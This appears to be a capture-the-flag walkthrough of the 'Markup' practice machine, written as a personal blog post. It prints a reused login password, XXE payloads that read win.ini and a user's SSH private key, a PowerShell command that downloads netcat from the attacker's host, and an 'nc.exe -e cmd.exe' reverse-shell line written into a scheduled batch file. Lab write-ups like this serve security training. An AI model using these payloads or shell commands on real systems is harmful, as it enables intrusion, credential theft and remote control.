Markup Walkthrough

Harith Dilshan -

After the Included Walkthrough, Here I'm with Markup, so... let's hack and grab the flags.

As I mentioned before, the starting point machines are a series of 9 machines rated as "Very Easy" and should be rooted in a sequence. So it means, if you need to go through this box, first of all you must have a complete Included machine.

Enough talks, πŸ₯± Let’s Get It Started πŸ±β€πŸ’»

Disclaimers: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedure to grab the flags! πŸ±β€πŸ‘€

00. Start Machine …

To start the machine, Just click on "Spawn Machine".

Then you can see the IP address for that machine. 🀠

Before going to enumeration steps we can simply ping to the IP address and check whether the VPN is connected and the machine is alive. Sometimes the machines might "Disable" ping requests when passing through the firewall. But in most cases ping will be a success! πŸ™‚

As a ping result, its TTL=127. There is only one route between machine and us (VPN). So definitely it will be a Windows machine.

01. Enumeration First …

01.1 Fast ports scan

As usual, run Nmap fast scan for all TCP ports to identify the ports which are open.

nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.49
-n  : Never do DNS resolution
-vv	: Extra verbosity
--open	: Output only open ports
-p-	: Full TCP ports range (65535)
-T4	: Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network

Here is the output πŸ‘‡

There're only webserver and SSH server. πŸ€·β€β™‚οΈπŸ€·β€β™‚οΈ

01.2 Run Nmap Scripting Engine

To get the best result, we can run the Nmap Scripting Engine for all open ports. Now we know all of the open ports and therefore, we can point out and run the script engine as fast as possible.

nmap -sV -sC -oN DetailPorts.nmap -p 22,80,443 10.10.10.49

So as usual, I chose webserver as my first enumeration path and I choose port 80 from that too. Let's open the web browser and navigate to the http://10.10.10.49/

This time, it is MegaShopping login page. Again it's time to check previous passwords. Do you remember we got some sql credentials from the include machine? Let's try those first. 🀨🀨

Daniel : >SNDv*2wzLWf Believe me we have done it at our first attempt. 😎😎

Now we have to take a moment to examine the surroundings of this site. While doing so, I found a way forward and this time it is XML external entity (XXE) injection. Okay now let's look at this from the beginning.

Power up Burp Suite and examine all the requests. While you are doing so, take a look at how the function works for submitting orders.

See! . It's an XML request. So let's begin.

XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access. source

Now you have an idea about XEE right? I got some sample exploit too from the above source. But since this is an windows machine we have to change some parts of that exploit. Final exploit will be look like this.πŸ‘‡πŸ‘‡

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"> ]>
  <order>
     <quantity>
          1
     </quantity>
     <item>
          &xxe;
     </item>
     <address>
          h4rithd.com
     </address>
  </order>

Now issue the request to the Repeater tab by using ctrl + r then navigate to the Repeater tab. Change the XML code as above and click send. You can examine the payload code by changing the &xxe; for other parameters as well (quantity & address) but it will not be successful! πŸ€·β€β™‚οΈπŸ€·β€

As you can see now, the exploit is working. Now what the hack can we do using this? 😏😏. We can view any files...πŸ™„πŸ™„ Again It's enumerating time. ⏳⏳

This machine has port 22 open, Wait.. If it is possible to grab the ssh private key, we can login to the system. Since we have one user name called Daniel let's use it. In windows file system default SSH keys were stored in C:\Users\<username>\.ssh\

Let's check if we can grab the id_rsa. The payload will be like below.πŸ‘‡πŸ‘‡

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///C:/Users/Daniel/.ssh/id_rsa"> ]>
  <order>
     <quantity>
          1
     </quantity>
     <item>
          &xxe;
     </item>
     <address>
          h4rithd.com
     </address>
  </order>

Oh gosh!! We grabbed the private key. πŸ”‘πŸ”‘

Now copy it to our machine and change the file permissions to read only by using chmod 600 id_rsa and then try to connect via ssh user as Daniel.

ssh -i id_rsa Daniel@10.10.10.49

We were entered to the machine as user Daniel. Let's grab the user flag now. πŸ˜‹πŸ˜‹

03. Privilege Escalation

Again we have windows machine to escalate the privileges. You can get cool ideas for Privilege Escalation by referring following links.

  1. Windows Privilege Escalation Fundamentals
  2. Privilege Escalation in Windows

While we're running the winPEAS on the background I got another SSH window to enumerate manually, so find what we can do. There, I found a folder called Log-Management in the top of root in drive C: So, time to have a quick look at what is inside that folder.

Here the folder has Batch file. Can we view that ??

The script will call the wevtutil.exe.

wevtutil | Enables you to retrieve information about event logs and publishers. You can also use this command to install and uninstall event manifests, to run queries, and to export, archive, and clear logs. source

By analyzing the source code, we understand that this script simply clears the system event logs. 😯😯

Let's take a look at the permission on this file using icacls command. I think this would be easy if we change the cmd shell as powershell. Just type powershell and hit enter.

Here it seems like the group BUILTIN\Users has the full control (F) over the batch file.

Builtin\users are all the users that the OS creates when installing the OS including local accounts (e.g. guest, ASP.NET or IUSR_hostname). It also includes all the users created in the domain. Authenticated users are all users that belong to the domain and have credentials. source

Since the above group has the full control over the file and all the users (even Daniel) are included to that group... we can edit that batch file. 🀐🀐

03.1 Getting the Reverse Shell

So to get the reverse shell using that script file; we need netcat binary and then create the payload file inside the batch file. So let's power up python web server and then download it into the Markup machine.

Navigate to C:\Users\Daniel\ and use the following command to download it into the Markup machine by using the power of powershell. Change <YourIP> as yours.☺☺

Powershell -c "IWR -useBasicParsing http://<YourIP>:8888/nc.exe -o nc.exe"

Then we can create the payload (netcat reverse shell) by using netcat binary to the job.bat file. Change <YourIP> as yours.

echo C:\Users\Daniel\nc.exe -e cmd.exe <YourIP> 7878> C:\Log-Management\job.bat

Then again power up the netcat listener and now we need to wait until that script runs as schedules in cron job.

We got the root flag. 😎😎

Now on the path of Starting point machines, we have only left two machine now.

I’ll see you on the next box! Guard πŸ™‹β€β™‚οΈπŸ™‹β€β™‚οΈ

Find me on @twitter